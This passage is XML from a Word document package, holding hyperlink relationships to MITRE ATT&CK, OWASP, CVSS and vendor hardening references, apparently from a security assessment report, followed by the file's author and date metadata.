Target="https://www.paloaltonetworks.com/cyberpedia/what-is-mfa-implementation" TargetMode="External" Id="R2c55689a2d27493f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R9a499e4665b54a40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1606/001/" TargetMode="External" Id="R4d91fdc3bd3b4e07" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1041" TargetMode="External" Id="R97ba383301834f79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/565.html" TargetMode="External" Id="R4e0398b3088c451d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/02-Testing_for_Cookies_Attributes" TargetMode="External" Id="R9a3be7dcae364e01" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/001/" TargetMode="External" Id="Rfd5d42d7b21e49ab" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047/" TargetMode="External" Id="Rbb6511697108446e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1050/" TargetMode="External" Id="R107332733aca4ad0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-security-center-antivirus" TargetMode="External" Id="R0972a65a9d27449f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R5e5161b43b734b33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1567/" TargetMode="External" Id="R900616888b93453a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/" TargetMode="External" Id="R901aa7e0ab894bb5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0801" TargetMode="External" Id="R89fa7c1be4144dfb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0800" TargetMode="External" Id="R3b306c5da7ae4327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-208a" TargetMode="External" Id="R8e2e42855a7a4b6b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html" TargetMode="External" Id="R18968d39dfdd422f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/" TargetMode="External" Id="R93894474c18841df" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1005/" TargetMode="External" Id="Rc55a7ac7e31940b2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1057/" TargetMode="External" Id="R13ebbc97ed7a46e9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022/" TargetMode="External" Id="Rc9f673391f6a42ad" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Path_Traversal" TargetMode="External" Id="R66b92abe06fd47d0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/file-path-traversal" TargetMode="External" Id="R1eae23edd66e4511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R2fbf03b75a5449b4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/" TargetMode="External" Id="R62abb4d7f76b4e6f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T0812/" TargetMode="External" Id="R690ffacc22204280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0801/" TargetMode="External" Id="R5a7d54c6a7f44d24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0927/" TargetMode="External" Id="R4840d9657e5b42cb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/cyberpedia/what-is-mfa-implementation" TargetMode="External" Id="R43e8eb7254ff490d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digicert.com/blog/creating-password-policy-best-practices" TargetMode="External" Id="R36c16297848d4cf7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Raa0ef85d444b4d0a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T0891/" TargetMode="External" Id="Rad5187fc4e444684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/" TargetMode="External" Id="Rb8c728520d234382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0801/" TargetMode="External" Id="Ra14d2cf31f334891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password" TargetMode="External" Id="R8c8a48f85e014f1c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/259.html" TargetMode="External" Id="Rf163e8847a5e4b7a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R83cdbb0ebec248b8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/004/" TargetMode="External" Id="Rf939a6781ec34bcc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047" TargetMode="External" Id="R519d992d658c446f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External" Id="R60989fb655f64f57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tcm-sec.com/pre-authentication-in-ad-environments/" TargetMode="External" Id="Rf87cf682c8eb4d87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techcommunity.microsoft.com/blog/microsoft-security-blog/helping-protect-against-as-rep-roasting-with-microsoft-defender-for-identity/2244089" TargetMode="External" Id="R1f67c449133b4566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R5e1e7ec32cc84dbc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1005/" TargetMode="External" Id="R7026ee0586f24dee" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1083/" TargetMode="External" Id="Rea46cd942a574e79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1057/" TargetMode="External" Id="R71d11973865a43f8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022/" TargetMode="External" Id="R4c290ea28726464c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048/" TargetMode="External" Id="R50b1373ea08644f1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion" TargetMode="External" Id="Rb8602dbd0dcc4d1c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rb7a01df253b84777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1482/" TargetMode="External" Id="Ra1777b73c3ff4234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/002/" TargetMode="External" Id="R6eef75549ce347ca" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047" TargetMode="External" Id="R1dca0d9044dd4c29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1030/" TargetMode="External" Id="R3d9ebad7ceb645f2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc.microsoft.com/update-guide/vulnerability/ADV190023" TargetMode="External" Id="Rf70ca3c5146b49cd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=https://support.microfocus.com/kb/doc.php%3Fid%3D7016339" TargetMode="External" Id="R7a0ab00a2bca452e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rffe00fbec9cd4e77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1189/" TargetMode="External" Id="Rab248e44450b49ea" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0818/" TargetMode="External" Id="R7432d11b53cc4a31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1021/" TargetMode="External" Id="R76e4cd3c41574d05" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/Security/Practical_implementation_guides/Cookies" TargetMode="External" Id="R4ffda745b7244841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/preventing" TargetMode="External" Id="R55c8ef887653498c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R0206f8a8a17f4030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557/" TargetMode="External" Id="R871e0bbdf444434a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1040/" TargetMode="External" Id="Rd5eb4b7016a946f3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1041" TargetMode="External" Id="R8b5c92de8998412a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0931/" TargetMode="External" Id="Rf0b0bfb632464d92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/topic/2020-2023-and-2024-ldap-channel-binding-and-ldap-signing-requirements-for-windows-kb4520412-ef185fb8-00f7-167d-744c-f299a66fc00a" TargetMode="External" Id="Rc385151269f242ca" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/troubleshoot/windows-server/active-directory/enable-ldap-signing-in-windows-server" TargetMode="External" Id="R4a37549eb1be4fee" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rc93e562267cf4a8a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1534/" TargetMode="External" Id="Ree0b6784813d40f3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598/" TargetMode="External" Id="R8bda3772a7d64ee7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1054/" TargetMode="External" Id="Re8b6c393e7354c98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0801/" TargetMode="External" Id="Rc63e2fd4885042b3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.duocircle.com/email-security/smtp-open-relay-vulnerabilities-how-to-prevent-security-breaches" TargetMode="External" Id="R232990f9694d4620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.higherlogic.com/blog/spf-dkim-dmarc-email-authentication/" TargetMode="External" Id="Rc4798c3423514776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1189/" TargetMode="External" Id="R12dd85e54d0145cb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/001/" TargetMode="External" Id="Ra40e4346021a4a1b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1021/" TargetMode="External" Id="R9e8668fab14d4248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1050/" TargetMode="External" Id="R29c71a93ecae48d3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityheaders.com/" TargetMode="External" Id="Rb8f1f42dcba34436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers" TargetMode="External" Id="Rdbb6173853d34ec0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557/001/" TargetMode="External" Id="R2dbcacc4bccd42dc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1042/" TargetMode="External" Id="R932ade7d67fe4cae" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1037/" TargetMode="External" Id="R67844b69ab5741d9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level" TargetMode="External" Id="R5038a8ef7b2d46e8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rb1d2ef93e6664e82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1567/" TargetMode="External" Id="Rc11f8ad57b6346f0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/" TargetMode="External" Id="Ra384acd70e0a44ca" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1041" TargetMode="External" Id="R4335b73ab0e747f7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1035/" TargetMode="External" Id="R2982a3aab95c4397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-api-security/" TargetMode="External" Id="R9ad39276398b4037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rb6a3e5cbd34e4839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1189/" TargetMode="External" Id="R66741c53b4cc4269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0818/" TargetMode="External" Id="R7b0c4c10b668409d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1021/" TargetMode="External" Id="Re931933b9ea0416b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/Security/Practical_implementation_guides/Cookies" TargetMode="External" Id="R025dc51ad0aa4d0c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/xss/" TargetMode="External" Id="Re1564666dfa443c1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/preventing" TargetMode="External" Id="R108d1b5127af461e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rdc75dae19b96417e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/" TargetMode="External" Id="Ra1281fbeb2c94b82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190/" TargetMode="External" Id="R4f8ea6933fe54fe9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1054/" TargetMode="External" Id="R1c5b064a9fc84a4c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/csrf" TargetMode="External" Id="R0fe7c620f1cd4cd8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Re29aa97dbbf54468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1534/" TargetMode="External" Id="Ra61352909a044714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598/" TargetMode="External" Id="R1a93c9aa9f6e4837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1054/" TargetMode="External" Id="R6f63f5fbdee341a9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.rackspace.com/docs/create-a-dmarc-policy" TargetMode="External" Id="R3e8a9f3b009a46ae" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.rackspace.com/docs/enable-dkim-in-the-cloud-office-control-panel" TargetMode="External" Id="R48b695741e924190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.higherlogic.com/blog/spf-dkim-dmarc-email-authentication/" TargetMode="External" Id="R574f553e75654c15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1611/" TargetMode="External" Id="R3b8ede3b29bf479e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/" TargetMode="External" Id="Ra2c963ce31bb4835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0926/" TargetMode="External" Id="R355e9d3d269f4229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/en-us/cybersecurity-101/identity-protection/principle-of-least-privilege-polp/" TargetMode="External" Id="R0fc2676cce524f16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1105/" TargetMode="External" Id="R93d4363fbd6c4832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048/" TargetMode="External" Id="R95ca3ddc3a8841cd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022/" TargetMode="External" Id="R49278790b83e4695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1035/" TargetMode="External" Id="R166dd4e4c70b4091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ibm.com/docs/en/i/7.4.0?topic=options-ftp-security" TargetMode="External" Id="Rdc1fcb1d93ac43ed" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/002/" TargetMode="External" Id="R2bfca42c3e7c481b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1105/" TargetMode="External" Id="R12d8d15a2d174c58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022/" TargetMode="External" Id="R09d6a93a7dae4a09" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1035/" TargetMode="External" Id="R2dfe4f98602a4974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows-server/storage/file-server/smb-security-hardening" TargetMode="External" Id="R9de6a37a687844ce" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.syxsense.com/syxsense-securityarticles/cis_benchmarks/syx-1033-12369.html" TargetMode="External" Id="R029fd7a5d3104131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0043/" TargetMode="External" Id="R516017143e014811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0801" TargetMode="External" Id="Re698639d33714171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0800" TargetMode="External" Id="R857cf3ea61ca4fa9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.speakeasy.com/api-design/expose-api-publicly" TargetMode="External" Id="Reb1c7d40d597449d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/010/" TargetMode="External" Id="R16c75b69fd864025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051/" TargetMode="External" Id="Rb23d69d2c7cd4ad5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/security/engineering/solving-tls1-problem" TargetMode="External" Id="R249a965cbdff48e1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tracesecurity.com/blog/articles/system-hardening-disabling-deprecated-tls-protocols" TargetMode="External" Id="R0ab65b4104784158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/" TargetMode="External" Id="R3ae89989d34b4e61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1054/" TargetMode="External" Id="R338383d7115b4cc9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account" TargetMode="External" Id="R2a091c2e50184367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595/" TargetMode="External" Id="Rc8e65380e7cf44e8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051/" TargetMode="External" Id="Ra5433668dea04ee9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/lifecycle/products/windows-server-2016" TargetMode="External" Id="R37939fc60efe4bd3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595/" TargetMode="External" Id="Raf5e4257d6ef4e9e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051/" TargetMode="External" Id="Ra5e17c38b2144235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/windows/windows-10-support-ends-on-october-14-2025-2ca8b313-1946-43d3-b55c-2b95b107f281" TargetMode="External" Id="R3f6cd2a6b9ab43c5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1042/" TargetMode="External" Id="Rbbdb14374c4e41c0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/lifecycle/faq/internet-explorer-microsoft-edge" TargetMode="External" Id="R71f4de4490e44280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1054/" TargetMode="External" Id="Rdaa8653233744c45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051/" TargetMode="External" Id="R2aff083172c647dc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/Improper_Error_Handling" TargetMode="External" Id="R5b073ca8ade642c5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/information-disclosure" TargetMode="External" Id="Re6a333488c9f4d54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/003/" TargetMode="External" Id="Re71210a7aea24c2f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1056/" TargetMode="External" Id="R99882894e8fc4df9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudflare.com/learning/ssl/what-is-an-ssl-certificate/" TargetMode="External" Id="R6ad1f4d5e72a4524" /><Relationship Type="http://schemas.microsoft.com/office/2020/10/relationships/intelligence" Target="intelligence2.xml" Id="R46019303b06d4ac9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R5fad2818f04c46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2025-09-20T22:23:01.1289861Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-24T03:23:05.6336899Z</dcterms:modified>
  <dc:creator>Drew Scott Levy</dc:creator>
  <lastModifiedBy>Drew Scott Levy</lastModifiedBy>
</coreProperties>
</file>